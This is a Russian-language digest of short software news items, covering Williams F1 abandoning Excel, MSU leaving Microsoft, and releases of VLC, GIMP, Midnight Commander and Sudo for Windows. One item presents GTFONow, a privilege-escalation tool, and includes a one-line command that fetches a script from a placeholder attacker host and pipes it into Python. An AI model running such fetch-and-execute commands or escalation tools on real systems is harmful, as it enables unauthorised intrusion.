Программное обеспечение
Новый руководитель команды Williams «Формулы-1» Джеймс Воулз обнаружил, что руководители различных служб несколько лет использовали файл Excel с таблицей из более чем 20 тыс. строк, в которых указаны все необходимые для проектирования и сборки болида автомобильные запчасти и детали.
«Невозможно ориентироваться и невозможно что-то обновить. В этом колоссальном файле Excel не было информации о том, сколько стоит каждая из этих деталей и сколько времени потребовалось на их производство, а также о том, были ли эти детали уже заказаны. Определение приоритета одной секции автомобиля над другой, от производства до проверки, было невозможным», — пояснил Воулз.
В итоге он решил перейти на новые процессы и системы управления, избавившись от Microsoft Excel.
«Когда вы сейчас начинаете отслеживать сотни тысяч компонентов, перемещающихся по вашей организации, таблица Excel становится бесполезной. Из-за множества состояний, в которых каждая деталь может быть заказана, отложена в заказе, проверена, возвращена, людям часто приходится прорабатывать детали. И как только вы начнёте повышать этот уровень сложности, на котором находится современная "Формула-1", электронная таблица Excel рушится, и проекты падают. И это именно то, где мы находились некоторое время, так как РП доводили себя до абсолютных пределов и ломались», — добавил Воулз. В 2017 году электронная таблица Excel для проектирования и сборки Renault Sport Formula One имела 77 тыс. строк. В компании также ушли от этого решения.
Московский государственный университет (МГУ) им. М. В. Ломоносова переведёт учётные записи и данные сотрудников вуза и студентов с онлайн-сервисов Microsoft на решения «Мой офис» и «Яндекс 360». Об этом решении СМИ рассказал директор центра развития электронных образовательных ресурсов МГУ Денис Янышев. 15 марта Microsoft отправила российским компаниям и вузам предупреждение о закрытии доступа к нескольким облачным продуктам.
«Мы подозревали. Такие шаги отлажены достаточно давно, так что идёт планомерная работа, во-первых, по переводу на "Яндекс 360", это для корпоративной среды. Вместо Microsoft Office мы подписали соглашение с "Мой офис", отечественный продукт»,— пояснил Янышев. По словам представителя вуза, руководство МГУ также планирует использовать сервисы Astra Linux и Rosa Linux. Янышев отметил, что уже сейчас университет использует для видеоконференцсвязи вместо Zoom сервисы Vinteo, «Телемост», SberJazz, MTS Link, TrueConf. «Так что мы внутренне были готовы к тому, что может произойти. Ну а дальше есть планы по планомерному переходу», — добавил Янышев. Он также отметил, что часть сотрудников уже перевели свои учётные записи на отечественные сервисы. Состоялся релиз проекта PDF Shaper 14.0, включая бесплатную версию PDF Shaper Free.
Решение PDF Shaper — это набор многофункционального ПО для работы с PDF, который позволяет легко разделять, объединять, ставить водяные знаки, подписывать, оптимизировать, конвертировать, шифровать и расшифровывать PDF-документы, а также удалять и перемещать страницы, извлекать текст и изображения. Программа оптимизирована для потребления низкого уровня ресурсов ЦП и работает в пакетном режиме, что позволяет пользователям обрабатывать несколько файлов PDF, одновременно выполняя другую работу на своих компьютерах.
PDF Shaper доступен в трёх редакциях: Free, Premium и Ultimate. Проект совместим с Windows 7, 8, 10, 11. Это решение доступно бесплатно для личного использования и для любой некоммерческой организации.
Основные изменения в PDF Shaper 14.0:
добавлен конвертер TXT в PDF;
профессиональная версия переименована в Ultimate;
возможности внешнего средства просмотра PDF: текстовый поиск, вращение и прокрутка страниц, возможность сохранить или удалить прикрёпленные файлы, асинхронная загрузка страниц,поддержка PDF-файлов размером более 4 ГБ;
обновлён пользовательский интерфейс и локализация;
обновлён встроенный просмотрщик PDF (режим предварительного просмотра);
улучшена производительность программы и использование процессора;
улучшена алгоритм преобразования PDF и DOC/DOCX;
решена проблема с перезаписью и переименованием повторяющихся файлов;
исправлена ошибка конвертации файлов Unicode DOC и DOCX.
«Группа Астра» и компания «Сбер» заявили, что СУБД Tantor SE 15 и платформа бизнес‑аналитики «Навигатор» успешно прошли испытание на совместимость. Оба продукта включены в реестр Минцифры России. Платформа «Навигатор» получила сертификат соответствия в рамках программы Ready for Аstra, рассказали информационной службе Хабра в пресс‑службе «Группы Астра».
«Навигатор» представляет собой омниканальную платформу визуализации данных. Она поддерживает 70 форматов представления информации, помогает быстро получить любой необходимый уровень детализации, создавать наглядные дашборды, вести онлайн‑отчётности, формировать бизнес‑аналитику в режиме реального времени, мониторить эффективность маркетинговых кампаний и выполнять другой функционал на основе визуализации данных. Доступ к документам и файлам можно получать в режиме онлайн и офлайн с планшета, телефона, ноутбука, ПК. По утверждениям разработчиков, в среднем платформа обрабатывает 11 ТБ данных в сутки со скоростью 27 тысяч событий в секунду.
У пользователей умных телевизоров от «Яндекса», например «ТВ Станций» и телевизоров под управлением YaOS, появился новый способ просматривать фото- и видеоконтент, размещённый на «Яндекс Диске». Они теперь могут смотреть снимки и видеоролики из путешествий, с семейных праздников и других важных событий в компании близких и друзей на большом экране. Для того чтобы начать пользоваться «Диском», входящим в виртуальное пространство сервиса «Яндекс 360», необходимо найти его в каталоге приложений телевизора под управлением YaOS или YaOS X и установить его на ТВ. Чтобы авторизоваться в приложении, пользователю нужно отсканировать QR-код камерой смартфона или с помощью приложения «Яндекс Ключ» с включённой двухфакторной аутентификацией.
После успешного входа пользователю станут доступны альбомы, которые есть в его облачном хранилище на «Яндекс Диске». ​​Можно зайти в любой из них, открыть файл из коллекции на весь экран, пролистать фотографии подряд и воспроизвести видео.
Разработчики пояснили, что просьба от пользователей добавить «Яндекс Диск» в каталог приложений для умных ТВ «Яндекса» была одной из самых частых после того, как в 2022 году там появился «Яндекс Браузер».
Проект VideoLAN преодолел рубеж в 5 млрд загрузок открытого видеоплеера VLC, зафиксированных системой сбора статистики, работающей на серверах проекта с февраля 2005 года. Около 4,4 млрд загрузок приходится на сборку VLC для платформы Windows, 369 млн — macOS, 245 млн — Android, 71 млн — iOS и 6.7 млн на архив с исходными текстами. Опубликованные VideoLAN данные не учитывают загрузку VLC для Linux, так как большинство Linux-пользователей VLC получает данный видеоплеер через штатные репозитории своих дистрибутивов. Наиболее популярной версией VLC является 3.0.16, которая была загружена 416 млн раз (для сравнения последний выпуск 3.0.20 был загружен 381 млн раз, 3.0.19 — 50 млн, а выпуск 3.0.0 — 6 млн). Дополнительно разработчики из VideoLAN сообщили о планах по созданию проекта VLC, скомпилированного в формат WebAssembly для встраивание проигрывателя на сайты. В разработке также находится VLC 4.0, в которой будет переписана базовая часть VLC, появится новый интерфейс, упрощающий навигацию по мультимедийным файлам, обеспечена интеграция со стриминговыми платформами и добавлена поддержка FAST-каналов (Free advertising supported streaming television) и online-трансляций, позволяющих бесплатно смотреть фильмы и телешоу, монетизируемые за счёт показа рекламы. VLC — бесплатный и свободный кросс-платформенный медиаплеер и медиаплатформа с открытым исходным кодом. VLC воспроизводит множество мультимедийных файлов, а также DVD, Audio CD, VCD и сетевые трансляции.
Источник: OpenNET.
Один из авторов термина Open Source и соучредитель Open Source Initiative Брюс Перенс представил первый черновой вариант новой лицензии Post-Open Zero-Cost, нацеленной на решение накопившихся проблем, связанных со взаимодействием разработчиков открытого ПО и коммерческих компаний в контексте получения справедливой обратной отдачи от коммерческого использования кода. В новой лицензии отражена возможность наложения дополнительных условий на коммерческое использование, например, за получаемую в результате использования открытого ПО выгоду компаниям предлагается расплачиваться либо участием в разработке, либо отчислять деньги, которые будут распределяться между непосредственными разработчиками. Ключевым отличием лицензии Post-Open от существующих открытых лицензий, таких как GPL, является введение договорной составляющей, доступной для расторжения в случае нарушения условий лицензии.
В Post-Open предусмотрено два вида договорных соглашений: бесплатный и платный. Платный договор предусматривает возможность заключения соглашения на предоставление дополнительных прав и применяется при коммерческом распространении продуктов или внесении изменений без их публичного раскрытия. Лицензия также определяет организацию POST-OPEN ADMINISTRATION, выступающую от имени лицензиаров, являющуюся их юридическим представителем, при необходимости отстаивающую их права и занимающуюся распределением полученных средств с учётом вклада в разработку. Источник: OpenNET.
Сегодня поговорим об инструменте GTFONow.
Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.
Основные особенности:
Автоматическая эксплуатация неправильно настроенных разрешений sudo.
Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
Автоматическая эксплуатация неправильных настроенных компонентов ОС.
Автоматическая эксплуатация через SSH‑ключи.
Автоматическая эксплуатация через файл используемый в cron.
Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
Легкий запуск без файлов с помощью
curl http://attackerhost/gtfonow.py | python
https://github.com/Frissi0n/GTFONow
Компании Makves (входит в группу компаний «Гарда») и «Ред софт» заявили о совместимости системы аудита и управления информационными ресурсами предприятия Makves DCAP и операционной системы (ОС) «Ред ОС». На основании испытаний Makves DCAP признана полностью совместимой с ОС, и вся функциональность решения доступна пользователям, рассказали информационной службе в пресс‑службе Makves. 1 февраля 2023 года вышла новая версия системы Makves DCAP. В Makves DCAP 4.3 усовершенствован модуль файлового аудита и настройки событий, улучшена классификация конфиденциальных данных, увеличена скорость выявления угроз, связанных с доступом и правами пользователей.
Началась первая в этом году онлайн-конференция для тестеров Microsoft под названием Windows Insider Bug Bash. Она продлится с 28 февраля по 4 марта (до 12 марта для Windows Server 2025).
Bug Bash — это особый период, в течение которого инсайдеры (тестеры) Windows помогают Microsoft обнаруживать и устранять ошибки в Windows 11, выполняя серию задач, называемых «квестами». Microsoft публикует эти квесты в приложении Feedback Hub, и их выполнение позволяет компании собрать необходимые данные о новых функциях и их производительности в предварительных сборках Windows 11. Квест Bug Bash может включать в себя опробование одной из новых функций, выполнение ряда действий, изменение определенных настроек и другие эксперименты с операционной системой. Вот как Microsoft описывает это событие: «Bug Bash» — это совместное мероприятие, на котором пользователи, разработчики и энтузиасты собираются вместе, чтобы выявлять ошибки в продукте и сообщать о них. Это возможность изучить новые функции, протестировать их и внести свой вклад в улучшение качества программного обеспечения. Участие в Bug Bash не является обязательным, и единственная награда, которую тестеры получают за помощь софтверному гиганту, — это специальный значок в вашем профиле Windows Insider.
Состоялся релиз Incus 0.6, ответвления LXD. Разработчики позиционируют этот открытый проект как современный, безопасный и мощный системный менеджер контейнеров и виртуальных машин.
Новый выпуск Incus включает в себя ряд улучшений, в том числе новый драйвер хранилища под названием lvmcluster, улучшения для пользователей открытой виртуальной сети (OVN), улучшения инструментов миграции, ряд новых функций безопасности, а также инструменты для резервного копирования (поддержка импорта/экспорта сегментов хранения). Выпуск Incus с долгосрочной поддержкой (LTS) запланирован через несколько месяцев, «чтобы совпасть с выпусками LTS LXC и LXCFS».
Ветеран Microsoft Реймонд Чен в своём блоге The Old New Thing с различными историями про ситуации в процессе разработки разных версий операционных систем компании раскрыл правильный способ аварийно завершить работу Windows для разных исследовательских целей.
Чен предостерёг разработчиков от использования в рамках тестирования специальной комбинации клавиш для вызывания BSoD, так как на современных системах это не работает. Драйвер клавиатуры распознает физический ввод на гораздо более низком уровне в стеке ввода, что позволяет инициировать сбой системы.
Чен попросил разработчиков не использовать дурацкие тактики типа удаления winlogon.exe, поскольку подобные подходы могут создать путаницу в логах и сообщать о несуществующих ошибках.
Чен напомнил, что у Microsoft есть удобный инструмент под названием NotMyFault (часть программного пакета SysInternals), который может вызывать различные сбои, зависания или утечки данных. Именно его Microsoft рекомендует использовать для тестирования сбоев стека, переполнения буфера, ошибок высокого уровня IRQL и многого другого.
Ранее Чен рассказал, как работала «тележка смерти» с USB-устройствами, вызывающими ВSoD, для тестирования и доработки ранних версий Windows. Аппарат включала более 60 последовательно подключённых USB-устройств разных типов и функций. Как правило, ПК после подключения к ней выдавали «синий экран смерти».
Состоялся релиз GIMP 2.99.18 — это последняя запланированная версия открытого графического редактора перед долгим путём к GIMP 3.0, который создавался десять лет в качестве альтернативы программному обеспечению Adobe Photoshop.
В GIMP 2.99.18 представлены новейшие разработки по исправлению обработки цвета в системе обработки изображений, улучшены алгоритмы цвета, проведена начальная работа по добавлению режима non-destructive (незарушаемого) редактирования, улучшена обработка шрифтов, добавлено автоматическое расширение слоев, новые параметры привязки, улучшена обработка файлов Adobe PSD, внесены правки во взаимодействия с Wayland и многое другое. GIMP 2.99.18 — это самая крупная версия разработки в ветке GIMP 2.99.
Хотя GIMP 2.99.18 содержит множество интересных улучшений, но они не все перейдут сразу в GIMP 3.0. Разработчики планируют выпустить GIMP 3.0 RC1 «в ближайшее время», а релиз GIMP 3.0 намечен к майской конференции Libre Graphics.
Вышла утилита auto-cpufreq 2.2.0 для автоматической оптимизации скорости работы CPU и энергопотребления в системе. Проект отслеживает состояние аккумулятора ноутбука, нагрузки на CPU, температуры CPU и активности в системе и в зависимости от ситуации и выбранных опций динамически активирует режимы энергосбережения или высокой производительности. Поддерживается работа на устройствах с процессорами Intel, AMD и ARM. Для управления может использоваться графический интерфейс на базе GTK или консольная утилита. Код проекта написан на языке Python и распространяется под лицензией LGPLv3.
Утилита поддерживает мониторинг частоты, нагрузки и температуры CPU, регулирование частоты и режимов энергопотребления CPU в зависимости от заряда аккумулятора, температуры и нагрузки на систему, автоматическую оптимизацию производительности CPU и энергопотребления. Auto-cpufreq может использоваться для автопродления времени автономной работы ноутбуков без постоянного урезания каких-то возможностей. В отличие от утилиты TLP, auto-cpufreq позволяет не только выставлять экономные режимы энергопотребления при автономной работе устройства, но и временно включать режим высокой производительности (turbo boost) при выявлении повышения нагрузки на систему. В новой версии добавлена поддержка настройки и переопределения параметров EPP (Energy Performance Preference), а также задания ограничений, связанных с зарядом аккумулятора.
Источник: OpenNET.
Microsoft официально представила новую функцию «Sudo для Windows» для Windows 11. Компания опубликовала наработки по проекту утилиты sudo на GitHub под открытой лицензией MIT. «Sudo для Windows» появилась спустя 44 года после выхода первой версии sudo на 4.1BSD.
«Наша команда работает над открытием исходного кода "Sudo для Windows". Вы можете внести свой вклад в скрипт sudo.ps1. Он предназначен для создания вспомогательной оболочки sudo.exe, которая обеспечивает более удобный интерфейс использования sudo из PowerShell», — обратились к сообществу специалисты из Microsoft.
Примечательно, что репозиторий Sudo for Windows Documentation ещё закрыт, но находится в разработке.
Sudo в Windows 11 можно будет включить через настройки для разработчика. Эта опция позволит управлять настройками, требующими административных привилегий, например, удалением приложений или изменением системных настроек.
В Microsoft пояснили, что проект только начал развиваться. «Если вам нужны дополнительные опции, которых нет в "Sudo для Windows", ознакомьтесь с gsudo разработчика Джерардо Гриньоли. Этот проект имеет ряд дополнительных функций и параметров конфигурации», — уточнили разработчики из Microsoft.
A Brief History of Sudo. Sudo было задумано и реализовано Бобом Коггешхоллом и Клиффом Спенсером примерно в 1980 году на факультете компьютерных наук SUNY/Buffalo, первый запуск утилиты был на VAX-11/750 под управлением 4.1BSD. Sudo в его нынешнем виде поддерживается мейнтейнером проекта Тоддом К. Миллером.
Разработчики каталога Flathub, позиционируемого как независимая от отдельных поставщиков площадка для распространения пакетов в формате Flatpak, объявили о достижении отметки в миллион активных пользователей. В настоящее время в каталоге представлено более 2400 приложений, из которых более 850 получили статус верифицированных, то есть сопровождаемых и поддерживаемых изначальными авторами и разработчиками. Общее число загрузок пакетов оценено командой Flathub в 1,6 миллиарда раз.
При подсчёте активных пользователей в Flathub вместо сбора метрик с систем пользователей специалисты платформы задействовали анализ статистики, доступной только на стороне инфраструктуры Flathub. Для прогнозирования числа активных клиентов использовалась привязка к числу установок runtime-наборов, предоставляющих типовое окружения для изолированного запуска приложений. В частности, для определения числа активных установок разработчиками Flathub было оценено число загрузок runtime с компонентами FreeDesktop и его обновлений до последней версии. Источники: OpenNET, 9to5Linux.
Команда разработчиков MC после пяти месяцев разработки опубликовала выпуск консольного файлового менеджера Midnight Commander 4.8.31. Исходный код проекта выложен на GitHub под лицензией GPLv3+.
Список основных изменений проекта:
в VFS добавлена поддержка формата сжатия LZO/LZOP;
виртуальная ФС uc1541, предоставляющая доступ к дисковым образам Commodore VIC20/C64/C128, обновлена до версии 3.6;
реализация виртуальной ФС s3+, используемая для доступа к хранилищу Amazon AWS S3, переведена на Python 3;
в VFS прекращена поддержка сервера и протокола FISH;
повышены требования к версии GLib, для работы теперь требуется как минимум выпуск 2.32.0;
в темах оформления добавлена поддержка назначения цветов для выделения в редакторе непечатных символов; на платформе FreeBSD в драйвере ext2fs добавлена поддержка атрибутов файлов; решена проблема с выставлением некорректного времени изменения после возобновления прерванной операции копирования;
в редакторе налажено удаление выделенных столбцов;
в Tar VFS решена проблема с обработкой жёстких ссылок; в Shell VFS решена проблема с именами файлов, включающими кириллические или диакритические символы. Источник: OpenNET.
Компания «Аскон» заявила о выпуске нового релиза систем Pilot для организации среды общих данных и коллективной работы над инвестиционно‑строительными проектами. Разработчики рассказали, что в новом релизе появились двухфакторная аутентификация, новый масштаб для измерения расстояний и площадей на чертежах, улучшенный анализ IFC‑файлов.
Среди изменений в новой версии Pilot:
доступен новый способ хранения и обработки данных о пользователях с использованием протокола OpenID Connect, позволяющий использовать двухфакторную аутентификацию и единый вход в разные приложения и системы;
в модулях Pilot‑BIM и Pilot‑ICE Enterprise появились возможности изменять при анализе чертежей планов и конструкций расстояния и площади на документе, управлять масштабом, единицами измерения и количеством знаков после запятой;
в модуле Pilot‑BIM IFC‑файлы появилась проверка на уникальность идентификаторов, прерывающая при обнаружении дублей модуля обработку модели и выводящая ошибку;
реализован веб‑сервер, предоставляющий доступ к возможностям клиентских приложений линейки продуктов Pilot из браузера.
С полным списком изменений можно ознакомиться здесь.
Состоялся первый релиз утилиты CPU-Z для Windows и ПК на ARM64.
Новая версия CPU-Z сохраняет текущий интерфейс. Проект был адаптирован для отображения ключевых характеристик процессоров ARM64, например, Qualcomm Snapdragon 8cx Gen 3, включая такие сведения, как название модели, архитектура ЦП, процесс изготовления, название модели графического процессора, характеристики ядра, поддерживаемые инструкции и так далее.
Из отличий от оригинальной версии утилиты можно отметить отсутствие вкладок с подробностями об SPD и интегрированным бенчмарком для определения уровня производительности. С другой стороны, версия ARM64 превосходит версию x86 в том, что там отображаются текущая тактовая частота как P‑ядер, так и E‑ядер, а также характеристики ЦП каждого кластера ядер.
Новая версия CPU-Z также получила поля для показа характеристик интегрированной в процессор графики, но в интерфейсе утилиты отсутствует отдельная вкладка с графикой. После двух лет разработки сформирован релиз системы распознавания текста Ocrad 0.29 (Optical Character Recognition), развиваемой под эгидой проекта GNU. Ocrad может применяться как в форме библиотеки для интеграции функций OCR в другие приложения, так и в форме обособленной утилиты, которая на основе переданного на вход изображения выдаёт текст в UTF-8 или 8-битных кодировках.
Для оптического распознавания в Ocrad используется метод выделения признаков (feature extraction). В состав входит анализатор макета страницы, позволяющий корректно разделять столбцы и блоки текста в печатных документах. Распознавание поддерживается только для символов из кодировок "ascii", "iso-8859-9" и "iso-8859-15" (поддержка кириллицы отсутствует). В новой версии GNU Ocrad 0.29: улучшено распознавание начертания буквы "L" с наклонённой правой частью;
при использовании опции '‑o' ('‑output') обеспечено создание недостающих промежуточных каталогов, указанных в заданном пути к файлу;
в сборочный файл configure и в Makefile.in добавлена переменная MAKEINFO; диагностические сообщения, связанные с файловыми операциями, преобразованы в форму 'PROGRAM: FILE: MESSAGE';
в сообщениях об использовании некорректных аргументов командной строки обеспечен показ аргумента и имени опции. Источник: OpenNET.